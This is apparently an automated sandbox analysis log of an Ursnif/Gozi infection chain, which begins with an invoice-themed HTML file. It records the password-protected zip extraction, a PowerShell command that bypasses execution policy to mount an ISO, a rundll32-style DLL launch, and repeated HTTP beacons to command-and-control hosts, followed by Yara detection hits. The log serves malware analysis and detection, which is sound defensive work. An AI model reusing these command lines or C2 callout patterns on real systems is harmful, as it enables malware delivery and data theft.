                                  Oct 18, 2022 21:44:10.796859980 CEST192.168.2.58.8.8.80x1076Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                  Oct 18, 2022 21:44:26.088641882 CEST192.168.2.58.8.8.80xf96Standard query (0)onlinetwork.topA (IP address)IN (0x0001)false
                                  Oct 18, 2022 21:44:46.381352901 CEST192.168.2.58.8.8.80xdddStandard query (0)linetwork.topA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Oct 18, 2022 21:43:07.206505060 CEST8.8.8.8192.168.2.50xb46cNo error (0)accounts.google.com142.250.203.109A (IP address)IN (0x0001)false
                                  Oct 18, 2022 21:43:07.412889957 CEST8.8.8.8192.168.2.50x3194No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                  Oct 18, 2022 21:43:07.412889957 CEST8.8.8.8192.168.2.50x3194No error (0)clients.l.google.com142.250.203.110A (IP address)IN (0x0001)false
                                  Oct 18, 2022 21:43:10.755620956 CEST8.8.8.8192.168.2.50x61d4No error (0)www.google.com142.250.203.100A (IP address)IN (0x0001)false
                                  Oct 18, 2022 21:44:10.816634893 CEST8.8.8.8192.168.2.50x1076No error (0)www.google.com142.250.203.100A (IP address)IN (0x0001)false
                                  Oct 18, 2022 21:44:26.107964039 CEST8.8.8.8192.168.2.50xf96No error (0)onlinetwork.top31.41.44.194A (IP address)IN (0x0001)false
                                  Oct 18, 2022 21:44:46.399236917 CEST8.8.8.8192.168.2.50xdddNo error (0)linetwork.top62.173.145.183A (IP address)IN (0x0001)false
                                  • accounts.google.com
                                  • clients2.google.com
                                  • onlinetwork.top
                                  • linetwork.top
                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.549704142.250.203.109443C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampkBytes transferredDirectionData


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.2.549706142.250.203.110443C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampkBytes transferredDirectionData


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  2192.168.2.54974031.41.44.19480C:\Users\user\AppData\Local\Temp\xxl.exe
                                  TimestampkBytes transferredDirectionData
                                  Oct 18, 2022 21:44:26.183836937 CEST666OUTGET /drew/UogjlH55j3MBdVW7Zgv8/7VAIAiwJ_2FicnQxfIo/vdYsidWojPlxWiOLycfrCH/0jMFVE77apOpr/yiV9EWj6/4LmIXy_2FzHYZsf_2BzbbER/6LftEOfnlg/Uzke2V7qIbQmNXXHb/tnLubrQ7fIkI/GL44ItzX_2B/5weW8TeiFRMx3R/0FalNtY_2FOlb5Arb_2Fa/ayhw4EzvdF98V_2F/QvfDYcXOi_2FxiR/FUnDGyMWNFOFvK99Tq/AboGOqHpH/FFIxlK22ZxSjYALa3Nyd/r2bY6gbX_2BKLnqSzWK/N5bQl56P/1.jlk HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                  Host: onlinetwork.top
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  3192.168.2.54974162.173.145.18380C:\Users\user\AppData\Local\Temp\xxl.exe
                                  TimestampkBytes transferredDirectionData
                                  Oct 18, 2022 21:44:46.470840931 CEST3247OUTGET /drew/0J0YP9e_2BE7jjAw7XL/AjrHr6NCwO_2Fgj3xqU8HO/e5KwJWvAPxhz7/Er8_2FGw/w6mbMJPoDfQgM_2F5q_2BTA/2EWmrv1LcM/HkHdywibkWgZEZttV/CVVHNFdmhCzK/32gECX5_2BF/KHHudCe_2FBTtm/7PKDpa0dUHWbR_2B1kpX9/AWYTWzr3Mrqxmvg2/b3_2B3bUAXRAtbT/lS0IcV4DbS6jYYG_2F/Ohgp0G9Gj/CtOwH_2BiEVt378VRySb/pgZSH7eC_2Bee3HXiCJ/BjrtGyiuFj_2Fduvn85Qkm/9VcCSZNN/bQ6ATZ6.jlk HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                  Host: linetwork.top
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  4192.168.2.54974431.41.44.19480C:\Users\user\AppData\Local\Temp\xxl.exe
                                  TimestampkBytes transferredDirectionData
                                  Oct 18, 2022 21:45:26.835650921 CEST7782OUTGET /drew/9HjvFMPL_/2BodLadHv2Ij_2BnGRof/O5HwRn2RgD6rqZ1SvG5/VMrxgkKm7ed8PnDV4333Df/zIgAPypmoxSLi/8BFA8aIq/BD3jcPWLpFftdB57Hvs_2Bt/pdv8XCmdY6/t4jYCo1nX0gAaeZmr/b90Tdg7fzlxH/cqhZiWRACEm/b39xMwhhk6CBY5/vAnGlr5gQfe7832Po6dgp/kFDd8JW_2BQt2yuf/g3y_2BsnEgcapzm/FqXLCXTc0ul_2Fu7dh/W1oq_2BeZ/dlpTOTrr2A44rzvoNR9t/Ed7vICgSqP/MZk6s.jlk HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                  Host: onlinetwork.top
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  5192.168.2.54974662.173.145.18380C:\Users\user\AppData\Local\Temp\xxl.exe
                                  TimestampkBytes transferredDirectionData
                                  Oct 18, 2022 21:45:47.238945961 CEST7817OUTGET /drew/TVgVtfJMME1TQDqbWdYo/ezMinaihuLtBtHa0yLo/29N_2BdcUX8GiKCW_2FFcH/G2EEXMAEzocHs/1j0yJOR1/eGMTPdpRhncWUghvDrmpfdi/eKYCLFtVRB/CVYtk9exYzeSrEd9o/r1M5RtNeelrL/BOq3WhytwH0/LSHm7cB7uN0f_2/BOF5OriNbSGHY_2Bu3zcM/HQrJ_2FDizJQq2kU/CdUDwQJw3ybpG6w/prA2XAjnZImMTnv_2B/y35swvqbW/8ll_2FkkiqSxdgXsTIPh/ZgYm_2BBwbPVDYoRfa8/RjAv97g.jlk HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                  Host: linetwork.top
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.549704142.250.203.109443C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampkBytes transferredDirectionData
                                  2022-10-18 19:43:09 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                  Host: accounts.google.com
                                  Connection: keep-alive
                                  Content-Length: 1
                                  Origin: https://www.google.com
                                  Content-Type: application/x-www-form-urlencoded
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: empty
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2022-10-18 19:43:09 UTC0OUTData Raw: 20
                                  Data Ascii:
                                  2022-10-18 19:43:09 UTC2INHTTP/1.1 200 OK
                                  Content-Type: application/json; charset=utf-8
                                  Access-Control-Allow-Origin: https://www.google.com
                                  Access-Control-Allow-Credentials: true
                                  X-Content-Type-Options: nosniff
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Tue, 18 Oct 2022 19:43:09 GMT
                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-BF70ZBDD6t0lX1EwN6V38g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  X-XSS-Protection: 0
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                  Accept-Ranges: none
                                  Vary: Accept-Encoding
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  2022-10-18 19:43:09 UTC4INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                  Data Ascii: 11["gaia.l.a.r",[]]
                                  2022-10-18 19:43:09 UTC4INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.2.549706142.250.203.110443C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampkBytes transferredDirectionData
                                  2022-10-18 19:43:09 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                  Host: clients2.google.com
                                  Connection: keep-alive
                                  X-Goog-Update-Interactivity: fg
                                  X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                  X-Goog-Update-Updater: chromecrx-104.0.5112.81
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: empty
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2022-10-18 19:43:09 UTC1INHTTP/1.1 200 OK
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-hEy0_act0i9D9LX1mClnlQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Tue, 18 Oct 2022 19:43:09 GMT
                                  Content-Type: text/xml; charset=UTF-8
                                  X-Daynum: 5769
                                  X-Daystart: 45789
                                  X-Content-Type-Options: nosniff
                                  X-Frame-Options: SAMEORIGIN
                                  X-XSS-Protection: 1; mode=block
                                  Server: GSE
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                  Accept-Ranges: none
                                  Vary: Accept-Encoding
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  2022-10-18 19:43:09 UTC2INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 37 36 39 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 34 35 37 38 39 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                  Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5769" elapsed_seconds="45789"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                  2022-10-18 19:43:09 UTC2INData Raw: 6d 78 76 59 6e 4d 76 4e 7a 49 30 51 55 46 58 4e 56 39 7a 54 32 52 76 64 55 77 79 4d 45 52 45 53 45 5a 47 56 6d 4a 6e 51 51 2f 31 2e 30 2e 30 2e 36 5f 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69
                                  Data Ascii: mxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" si
                                  2022-10-18 19:43:09 UTC2INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Click to jump to process

                                  Target ID:0
                                  Start time:21:43:03
                                  Start date:18/10/2022
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                  Imagebase:0x7ff7d31b0000
                                  File size:2851656 bytes
                                  MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:1
                                  Start time:21:43:04
                                  Start date:18/10/2022
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1828,i,17767483613737774087,6421309370746719837,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                  Imagebase:0x7ff7d31b0000
                                  File size:2851656 bytes
                                  MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:2
                                  Start time:21:43:05
                                  Start date:18/10/2022
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Invoice_7892_18Oct.html
                                  Imagebase:0x7ff7d31b0000
                                  File size:2851656 bytes
                                  MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:3
                                  Start time:21:43:10
                                  Start date:18/10/2022
                                  Path:C:\Windows\SysWOW64\unarchiver.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\8fa2db5f-d558-4ee3-8a83-68f3e15e482f.zip
                                  Imagebase:0x6e0000
                                  File size:12288 bytes
                                  MD5 hash:7191DD7E0FE495A5CBF4036801562347
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:moderate

                                  Target ID:4
                                  Start time:21:43:10
                                  Start date:18/10/2022
                                  Path:C:\Windows\SysWOW64\7za.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\System32\7za.exe" x -p758493 -y -o"C:\Users\user\AppData\Local\Temp\krjmempf.vdz" "C:\Users\user\Downloads\8fa2db5f-d558-4ee3-8a83-68f3e15e482f.zip
                                  Imagebase:0xf00000
                                  File size:289792 bytes
                                  MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:5
                                  Start time:21:43:10
                                  Start date:18/10/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7fcd70000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:6
                                  Start time:21:43:13
                                  Start date:18/10/2022
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:cmd.exe" /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\krjmempf.vdz\5353.iso
                                  Imagebase:0x11d0000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:7
                                  Start time:21:43:13
                                  Start date:18/10/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7fcd70000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:8
                                  Start time:21:43:14
                                  Start date:18/10/2022
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\krjmempf.vdz\5353.iso"
                                  Imagebase:0xf10000
                                  File size:430592 bytes
                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:high

                                  Target ID:12
                                  Start time:21:43:38
                                  Start date:18/10/2022
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /c internee\highlighted.cmd dll32.exe tem dows
                                  Imagebase:0x11d0000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Target ID:13
                                  Start time:21:43:38
                                  Start date:18/10/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7fcd70000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Target ID:14
                                  Start time:21:43:39
                                  Start date:18/10/2022
                                  Path:C:\Users\user\AppData\Local\Temp\xxl.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Local\Temp\xxl.exe internee\reservations.3ds,DllRegisterServer
                                  Imagebase:0xcb0000
                                  File size:61952 bytes
                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000E.00000003.424404208.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 0000000E.00000003.424404208.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000E.00000003.424404208.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000E.00000003.424565184.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 0000000E.00000003.424565184.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000E.00000003.424565184.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000E.00000003.424527278.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 0000000E.00000003.424527278.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000E.00000003.424527278.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000E.00000002.719611917.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000E.00000003.424606471.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 0000000E.00000003.424606471.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000E.00000003.424606471.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000E.00000003.641720326.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 0000000E.00000003.641720326.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000E.00000003.641720326.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000E.00000002.719654681.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 0000000E.00000002.719654681.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000E.00000002.719654681.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000E.00000002.719379551.0000000002DE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000E.00000003.424635510.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 0000000E.00000003.424635510.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000E.00000003.424635510.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000E.00000003.424671008.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 0000000E.00000003.424671008.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000E.00000003.424671008.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000E.00000003.424712096.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 0000000E.00000003.424712096.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000E.00000003.424712096.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000E.00000003.424336717.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 0000000E.00000003.424336717.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000E.00000003.424336717.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  Antivirus matches:
                                  • Detection: 0%, ReversingLabs
                                  • Detection: 0%, Metadefender, Browse

                                  No disassembly